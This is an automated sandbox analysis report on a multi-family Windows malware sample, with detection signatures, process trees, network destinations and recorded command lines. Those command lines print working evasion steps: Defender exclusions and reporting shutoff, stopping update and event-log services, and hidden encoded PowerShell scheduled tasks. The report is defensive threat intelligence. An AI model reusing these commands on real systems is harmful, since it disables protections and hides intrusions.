Malware Analysis Report

2025-01-02 11:06

Sample ID 240315-cfnqzadg6y
Target 08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe
SHA256 08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856
Tags
amadey djvu smokeloader stealc xmrig pub1 backdoor discovery evasion miner persistence ransomware stealer trojan upx dcrat lumma socks5systemz botnet infostealer rat spyware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856

Threat Level: Known bad

The file 08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe was found to be: Known bad.

Malicious Activity Summary

amadey djvu smokeloader stealc xmrig pub1 backdoor discovery evasion miner persistence ransomware stealer trojan upx dcrat lumma socks5systemz botnet infostealer rat spyware

DcRat

xmrig

Lumma Stealer

UAC bypass

Windows security bypass

Socks5Systemz

Djvu Ransomware

SmokeLoader

Stealc

Amadey

UPX dump on OEP (original entry point)

Detects executables packed with VMProtect.

Detects executables (downlaoders) containing URLs to raw contents of a paste

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.

Detects executables packed with or use KoiVM

Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs.

XMRig Miner payload

Detect binaries embedding considerable number of MFA browser extension IDs.

Drops file in Drivers directory

Creates new service(s)

Blocklisted process makes network request

Stops running service(s)

Downloads MZ/PE file

Reads user/profile data of web browsers

Reads WinSCP keys stored on the system

Reads local data of messenger clients

Windows security modification

Drops startup file

Loads dropped DLL

Modifies file permissions

Checks BIOS information in registry

Checks computer location settings

Unexpected DNS network traffic destination

Reads data files stored by FTP clients

UPX packed file

Executes dropped EXE

Drops desktop.ini file(s)

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Looks up external IP address via web service

Enumerates connected drives

Checks whether UAC is enabled

Drops Chrome extension

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Program Files directory

Launches sc.exe

Drops file in Windows directory

Program crash

Enumerates physical storage devices

NSIS installer

Checks processor information in registry

Enumerates system info in registry

Creates scheduled task(s)

Runs ping.exe

Modifies data under HKEY_USERS

Suspicious behavior: MapViewOfSection

Suspicious use of FindShellTrayWindow

Checks SCSI registry key(s)

Uses Task Scheduler COM API

Modifies system certificate store

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of UnmapMainImage

Suspicious use of SetWindowsHookEx

System policy modification

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-15 02:01

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-15 02:01

Reported

2024-03-15 02:03

Platform

win7-20240221-en

Max time kernel

9s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe"

Signatures

Amadey

trojan amadey

Djvu Ransomware

ransomware djvu

SmokeLoader

trojan backdoor smokeloader

Stealc

stealer stealc

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A

xmrig

miner xmrig

Detect binaries embedding considerable number of MFA browser extension IDs.

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs.

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.

Description Indicator Process Target
N/A N/A N/A N/A

Detects executables (downlaoders) containing URLs to raw contents of a paste

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables packed with VMProtect.

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables packed with or use KoiVM

Description Indicator Process Target
N/A N/A N/A N/A

UPX dump on OEP (original entry point)

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Creates new service(s)

persistence

Downloads MZ/PE file

Stops running service(s)

evasion

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bsik9hWLX8TuLLCcHcOuy4Am.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyvqQmcj7CKDrZb8pSqlgPeI.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZVjA36lsHqCR8je6lfJdLLai.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\2OH5imM6TnR5CcpBac6BXJ9F.exe N/A
N/A N/A C:\Users\Admin\Pictures\xu9BFB7O4AHpyqKeeF8VSj4J.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1176 set thread context of 2500 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Enumerates physical storage devices

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1176 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1176 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1176 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1176 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1176 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1176 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1176 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1176 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1176 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1176 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1176 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1176 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1176 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\system32\WerFault.exe
PID 1176 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\system32\WerFault.exe
PID 1176 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\system32\WerFault.exe
PID 2500 wrote to memory of 2312 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\SysWOW64\forfiles.exe
PID 2500 wrote to memory of 2312 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\SysWOW64\forfiles.exe
PID 2500 wrote to memory of 2312 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\SysWOW64\forfiles.exe
PID 2500 wrote to memory of 2312 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\SysWOW64\forfiles.exe
PID 2500 wrote to memory of 1484 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\xu9BFB7O4AHpyqKeeF8VSj4J.exe
PID 2500 wrote to memory of 1484 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\xu9BFB7O4AHpyqKeeF8VSj4J.exe
PID 2500 wrote to memory of 1484 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\xu9BFB7O4AHpyqKeeF8VSj4J.exe
PID 2500 wrote to memory of 1484 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\xu9BFB7O4AHpyqKeeF8VSj4J.exe
PID 2500 wrote to memory of 1484 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\xu9BFB7O4AHpyqKeeF8VSj4J.exe
PID 2500 wrote to memory of 1484 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\xu9BFB7O4AHpyqKeeF8VSj4J.exe
PID 2500 wrote to memory of 1484 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\xu9BFB7O4AHpyqKeeF8VSj4J.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe

"C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 1176 -s 768

C:\Users\Admin\Pictures\2OH5imM6TnR5CcpBac6BXJ9F.exe

"C:\Users\Admin\Pictures\2OH5imM6TnR5CcpBac6BXJ9F.exe"

C:\Users\Admin\Pictures\xu9BFB7O4AHpyqKeeF8VSj4J.exe

"C:\Users\Admin\Pictures\xu9BFB7O4AHpyqKeeF8VSj4J.exe"

C:\Users\Admin\Pictures\NqpPj3yz5Tax23hlO38w94Tb.exe

"C:\Users\Admin\Pictures\NqpPj3yz5Tax23hlO38w94Tb.exe"

C:\Users\Admin\AppData\Local\Temp\is-T9COE.tmp\xu9BFB7O4AHpyqKeeF8VSj4J.tmp

"C:\Users\Admin\AppData\Local\Temp\is-T9COE.tmp\xu9BFB7O4AHpyqKeeF8VSj4J.tmp" /SL5="$6016E,1511216,54272,C:\Users\Admin\Pictures\xu9BFB7O4AHpyqKeeF8VSj4J.exe"

C:\Users\Admin\Pictures\OBvn2pn32QFv2fhf3uItXlPI.exe

"C:\Users\Admin\Pictures\OBvn2pn32QFv2fhf3uItXlPI.exe"

C:\Users\Admin\AppData\Local\Temp\syncUpd.exe

C:\Users\Admin\AppData\Local\Temp\syncUpd.exe

C:\Users\Admin\AppData\Local\Lina Text\linatext.exe

"C:\Users\Admin\AppData\Local\Lina Text\linatext.exe" -i

C:\Users\Admin\Pictures\TbHGazVm41TRJC4RixlqJGgQ.exe

"C:\Users\Admin\Pictures\TbHGazVm41TRJC4RixlqJGgQ.exe"

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Lina Text\linatext.exe

"C:\Users\Admin\AppData\Local\Lina Text\linatext.exe" -s

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"

C:\ProgramData\Google\Chrome\updater.exe

C:\ProgramData\Google\Chrome\updater.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\explorer.exe

explorer.exe

C:\Users\Admin\Pictures\koaOpOOsbLJmJTO8gih3cBYb.exe

"C:\Users\Admin\Pictures\koaOpOOsbLJmJTO8gih3cBYb.exe"

C:\Users\Admin\AppData\Local\Temp\7zS344A.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS3ABF.tmp\Install.exe

.\Install.exe /QnjvBdidv "385118" /S

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\4D55.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gPfwHkElh" /SC once /ST 00:26:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gPfwHkElh"

C:\Windows\system32\taskeng.exe

taskeng.exe {518B6E4C-EAEA-46AE-B39B-CFCEE8C5867E} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:Interactive:[1]

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\DHCFIDAKJD.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\GDGHIDBKJE.exe"

C:\Users\Admin\AppData\Local\Temp\DHCFIDAKJD.exe

"C:\Users\Admin\AppData\Local\Temp\DHCFIDAKJD.exe"

C:\Users\Admin\AppData\Local\Temp\8C78.exe

C:\Users\Admin\AppData\Local\Temp\8C78.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\DHCFIDAKJD.exe

C:\Windows\SysWOW64\PING.EXE

ping 2.2.2.2 -n 1 -w 3000

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gPfwHkElh"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bnTqljwkAIckBwCXiX" /SC once /ST 02:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\cTmyoaxliqPIUed\RRZnTnn.exe\" tC /rmsite_idUkD 385118 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\8C78.exe

C:\Users\Admin\AppData\Local\Temp\8C78.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\f8e83638-66ca-4ebb-8358-3437f89cb012" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Windows\system32\taskeng.exe

taskeng.exe {5A96A6D0-AF67-4A85-94D7-3F1D7F83F748} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\Admin\AppData\Local\Temp\8C78.exe

"C:\Users\Admin\AppData\Local\Temp\8C78.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\8C78.exe

"C:\Users\Admin\AppData\Local\Temp\8C78.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\cTmyoaxliqPIUed\RRZnTnn.exe

C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\cTmyoaxliqPIUed\RRZnTnn.exe tC /rmsite_idUkD 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gYIRtCzHc" /SC once /ST 00:19:49 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gYIRtCzHc"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
US 104.21.79.77:443 yip.su tcp
US 172.67.34.170:443 pastebin.com tcp
US 8.8.8.8:53 voxel.dofuly.info udp
US 8.8.8.8:53 sty.ink udp
US 8.8.8.8:53 galandskiyher5.com udp
US 8.8.8.8:53 net.geo.opera.com udp
NL 91.92.250.47:80 91.92.250.47 tcp
DE 185.172.128.126:80 185.172.128.126 tcp
NL 91.92.250.47:80 91.92.250.47 tcp
NL 185.26.182.111:80 net.geo.opera.com tcp
US 172.67.200.219:443 sty.ink tcp
NL 185.26.182.111:443 net.geo.opera.com tcp
US 104.21.62.68:80 voxel.dofuly.info tcp
RU 81.94.159.197:80 galandskiyher5.com tcp
US 8.8.8.8:53 564675367.xyz udp
SE 192.229.221.95:80 tcp
SK 45.95.11.69:443 tcp
DE 185.172.128.90:80 185.172.128.90 tcp
US 8.8.8.8:53 iplogger.com udp
US 172.67.188.178:443 iplogger.com tcp
DE 185.172.128.187:80 185.172.128.187 tcp
DE 185.172.128.145:80 185.172.128.145 tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 trad-einmyus.com udp
RU 81.94.159.197:80 trad-einmyus.com tcp
US 8.8.8.8:53 sdfjhuz.com udp
HN 138.204.181.135:80 sdfjhuz.com tcp
DE 185.172.128.187:80 185.172.128.187 tcp
US 8.8.8.8:53 api.2ip.ua udp
US 172.67.139.220:443 api.2ip.ua tcp
US 8.8.8.8:53 sportessentia.home.pl udp
